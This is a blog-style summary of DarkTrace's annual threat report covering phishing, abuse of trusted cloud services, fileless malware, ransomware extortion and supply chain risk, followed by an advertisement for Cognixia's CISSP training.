DarkTrace’s Latest Annual Threat Report

In the ever-evolving cybersecurity landscape, staying informed about the latest threats is not just a best practice—it’s a necessity. DarkTrace’s latest Annual Threat Report provides crucial insights into cybersecurity threats facing organizations worldwide. With more than 30.4 million phishing emails detected last year alone and an alarming trend of cybercriminals exploiting trusted third-party enterprise services, this report serves as both a warning and a guide for cybersecurity professionals and business leaders alike.

The Rising Tide of Phishing Attacks

The sheer volume of phishing attempts documented in DarkTrace’s report is staggering. With over 30.4 million phishing emails identified in the past year, these attacks continue to serve as the primary entry point for cybercriminals. But what makes today’s phishing attacks different from those of previous years is their increasing sophistication and ability to bypass traditional security measures.

Modern phishing attempts no longer rely solely on obvious grammatical errors or suspicious sender addresses. Instead, they leverage advanced social engineering techniques and mimic legitimate business communications with frightening accuracy. The report highlights that these attacks are becoming increasingly targeted, with cybercriminals researching their victims before crafting personalized emails that are more likely to succeed.

These aren’t random, scatter-shot attempts. They are calculated, researched, and executed with precision. Cybercriminals are investing time and resources to understand your organization’s communication patterns, hierarchies, and business operations to craft highly convincing phishing attempts that even tech-savvy employees might fall for.

Exploitation of Trusted Enterprise Services

Perhaps the most concerning finding in the DarkTrace report is the systematic exploitation of trusted third-party enterprise services. Platforms that form the backbone of modern remote and collaborative work environments—Zoom Docs, HelloSign, Adobe, Microsoft SharePoint, and others—have all been weaponized by attackers.

The Trust Paradox

These services are trusted implicitly by both users and security systems alike. When you receive a SharePoint link from a colleague or a Zoom document invitation, your instinct is to trust it. Similarly, many security systems are configured to whitelist these services, creating a perfect opportunity for attackers.

The report documents numerous cases where cybercriminals have compromised accounts on these platforms or created misleading content that appears to come from them. For instance, fake document-sharing notifications that lead to credential harvesting sites or malicious file downloads have become increasingly common.

Microsoft SharePoint: A Primary Target

Microsoft SharePoint, given its widespread adoption in enterprise environments, has become a particularly favored target. The report details how attackers create convincing SharePoint phishing pages that request Office 365 credentials. Once obtained, these credentials provide access to email accounts, which can then be used for internal phishing campaigns, data exfiltration, or further network penetration.

It is worth noting that these attacks are especially dangerous because they come from trusted domains. An email from “sharepoint.com” or containing legitimate Microsoft branding is far less likely to trigger suspicion than one from an unknown source.

Malicious Payload Delivery Through Legitimate Services

Another significant trend identified in the report is the use of legitimate cloud services for malicious payload delivery. Google Drive, Dropbox, Amazon Simple Email Service (SES), and other widely used platforms are being leveraged to host and distribute malware.

Why Legitimate Services?

The reason for this approach is simple yet effective: these services are rarely blocked by corporate firewalls or email security gateways. When malware is downloaded from Google Drive rather than a suspicious domain, it’s more likely to bypass security measures.

Furthermore, these services often use HTTPS connections, meaning that the data transfer is encrypted. This encryption can prevent security tools from inspecting the content being downloaded, allowing malware to slip through undetected.

Multi-Stage Attack Chains

The report emphasizes that modern attacks rarely rely on a single method. Instead, they employ multi-stage attack chains that might begin with a phishing email, lead to a legitimate service hosting malware, and end with the execution of that malware on a victim’s system.

For example, a typical attack might follow this pattern:

1. A phishing email contains a link to a Google Drive document
2. The document contains macros or embedded links to additional content
3. This secondary content triggers the download of malware from another legitimate service
4. The malware establishes a connection to command and control servers

Each step in this chain leverages different legitimate services, making detection and prevention challenging for traditional security approaches.

The Rise of Fileless Malware

DarkTrace’s report also highlights the growing prevalence of fileless malware attacks. Unlike traditional malware that writes files to disk, fileless malware operates entirely in memory, making it extremely difficult to detect using conventional methods.

Living Off the Land

These attacks often use legitimate system tools and processes to accomplish their goals—a technique known as “living off the land.” By using PowerShell, Windows Management Instrumentation (WMI), and other native Windows tools, attackers can execute malicious commands without installing any software that might trigger security alerts.

The report notes that these attacks have increased by a significant percentage over the previous year, indicating that cybercriminals are adapting their techniques to evade modern security solutions.

Ransomware Evolution: From Encryption to Extortion

While ransomware remains a significant threat, the report documents an evolution in ransomware tactics. Rather than simply encrypting data and demanding payment for its release, modern ransomware attacks frequently involve data exfiltration as well.

Double Extortion Tactics

This “double extortion” approach gives attackers two leverage points: they can demand payment for decryption keys and threaten to publish stolen data if their demands aren’t met. Even organizations with robust backup solutions find themselves vulnerable to this approach, as backups protect against data loss but not data exposure.

The report indicates that ransom demands have continued to increase, with some attackers demanding tens of millions of dollars from larger enterprises. Additionally, ransomware operators have become more professional, offering “customer service” to assist victims with payment and decryption.

Supply Chain Vulnerabilities Exposed

The report dedicates significant attention to supply chain attacks, which became particularly prominent following incidents like the SolarWinds compromise. These attacks target trusted vendors and software providers, using them as a vector to reach their actual targets.

The Multiplier Effect

What makes supply chain attacks particularly dangerous is their multiplier effect. A single compromise can potentially affect thousands or even millions of downstream customers. The report notes that attackers are increasingly focusing on small to medium-sized vendors that might have less robust security but still maintain connections to valuable targets.

For your organization, this means that your security is only as strong as the weakest link in your supply chain. The report emphasizes the need for comprehensive vendor security assessments and continuous monitoring of third-party access to your systems.

Cloud Configuration Errors: A Growing Concern

As more organizations migrate to cloud environments, misconfigurations have become a major vulnerability. The DarkTrace report highlights numerous incidents where improperly secured cloud resources led to data breaches.

Common Misconfigurations

Some of the most common cloud security errors identified in the report include:

• Publicly accessible storage buckets
• Overly permissive Identity and Access Management (IAM) roles
• Inadequate encryption of sensitive data
• Lack of multi-factor authentication for critical resources
• Insufficient logging and monitoring

These misconfigurations often result from a lack of cloud security expertise or the rapid pace of cloud adoption that outstrips security teams’ ability to properly secure new resources.

The Human Element: Social Engineering Tactics

Despite advances in technical security measures, the human element remains a critical vulnerability. The DarkTrace report provides an extensive analysis of social engineering tactics that bypass technological defenses by manipulating human psychology.

Exploiting Current Events

The report notes that attackers quickly adapt their social engineering approaches to exploit current events and trends. During the pandemic, COVID-19-themed phishing was prevalent. More recently, geopolitical events, economic concerns, and even popular culture have been leveraged to create convincing pretexts for phishing attempts.

One needs to understand that social engineering attacks succeed because they trigger emotional responses—curiosity, fear, urgency—that override rational thinking and security awareness. The report emphasizes that even well-trained employees can fall victim to sufficiently sophisticated social engineering attacks.

Artificial Intelligence: Both Threat and Defense

An emerging trend covered in the DarkTrace report is the dual role of artificial intelligence in cybersecurity—as both a threat and a defense mechanism.

AI-Powered Attacks

The report documents the increasing use of AI by attackers to:

• Generate convincing phishing emails that mimic human writing styles
• Identify vulnerable systems more efficiently
• Automate the customization of attacks based on gathered intelligence
• Evade detection by learning security system patterns

These AI-powered attacks can scale more effectively and adapt more quickly than traditional methods, presenting a significant challenge to security teams.

AI-Driven Defense

On the defensive side, the report highlights how organizations are leveraging AI, including DarkTrace’s own solutions, to:

• Detect anomalous behavior that indicates potential breaches
• Respond automatically to contain threats before they spread
• Predict potential attack vectors based on organizational vulnerabilities
• Continuously learn and adapt to new threat patterns

The report suggests that AI-driven security will become essential as the volume, velocity, and sophistication of attacks continue to increase beyond what human analysts can effectively monitor.

Recommendations and Best Practices

Based on the findings in the report, several key recommendations emerge for organizations looking to strengthen their security posture:

Implement Zero Trust Architecture

The traditional perimeter-based security model is no longer sufficient. The report strongly advocates for a zero-trust approach where nothing—internal or external—is trusted by default, and verification is required for all access attempts.

Focus on Detection and Response

Given that prevention will inevitably fail against sufficiently determined attackers, the report emphasizes the importance of robust detection and response capabilities. Reducing “dwell time”—the period between initial compromise and detection—is critical to limiting damage.

Address the Human Element

Technical solutions alone are insufficient. The report recommends comprehensive security awareness training that goes beyond annual compliance exercises to create a security-conscious culture throughout the organization.

Secure The Supply Chain

Implement rigorous vendor security assessments and continuous monitoring of third-party access to your systems and data.

Adopt Integrated Security Tools

Rather than relying on a patchwork of point solutions, the report suggests that organizations benefit from integrated security platforms that can correlate data from multiple sources to identify complex attack patterns.

The DarkTrace Annual Threat Report paints a picture of an increasingly complex threat landscape where attackers are constantly innovating and adapting. Traditional security approaches are proving inadequate against these evolving threats, necessitating a more dynamic and comprehensive approach to cybersecurity.

For your organization, the key takeaway should be that security is no longer a static goal to be achieved but an ongoing process of adaptation and improvement. By understanding the threat landscape detailed in this report and implementing the recommended security measures, you can significantly reduce your risk exposure in this challenging environment.

Remember that cybersecurity is not solely an IT responsibility but a business imperative that requires commitment from all levels of the organization. The threats outlined in the DarkTrace report affect every aspect of modern business operations, making cybersecurity a fundamental component of business strategy rather than simply a technical consideration.

By staying informed about the latest threats and continuously evolving your security posture, you can protect your organization’s assets, reputation, and operations in an increasingly hostile digital environment.

 

 

Get CISSP certification with Cognixia

Once you have employees with the CISSP certification, they will demonstrate their skills to benefit your business with –

• Complete understanding of how to secure or protect confidential business data from hackers.
• Analyze risks and be aware of the common hacker strategies that can affect your business. They can determine the weak points of the organizations and work on them.
• Aptitude in improving not only the customer but also employee privacy ensuring all the information stays with the business only.

Get (ISC)2 CISSP Training & Certification and increase your business visibility as well as credibility in the cybersecurity market. Cognixia is the world’s leading digital talent transformation company that offers a wide range of courses, including CISSP training online with a comprehensive CISSP study guide.

Here’s what you will learn in this course –

• Learn and apply the concepts of security & risk management
• Gain an understanding of security engineering to protect information by exploring and examining security models and frameworks
• Learn how to identify, categorize, & prioritize assets
• Examination and security network architecture and its components
• Learn how to identify & control access to protect assets
• Designing and conducting security assessment strategies, logging, & monitoring activities
• Developing a recovery strategy and maintaining operational resilience
• Learn how to secure the software development cycle

Prerequisites

• Candidates for the CISSP certification should have at least 5 years of total paid work experience in two or more of the 8 CISSP CBK domains. Any extra certificate from the (ISC)2 authorized list, a four-year college degree, or a regional equivalent would qualify as one year of the necessary experience.
• If a candidate doesn’t have enough experience to qualify as a CISSP, they can still become an Associate of (ISC)2 by completing the CISSP test. After that, they will have 6 years to acquire the 5 years of necessary experience.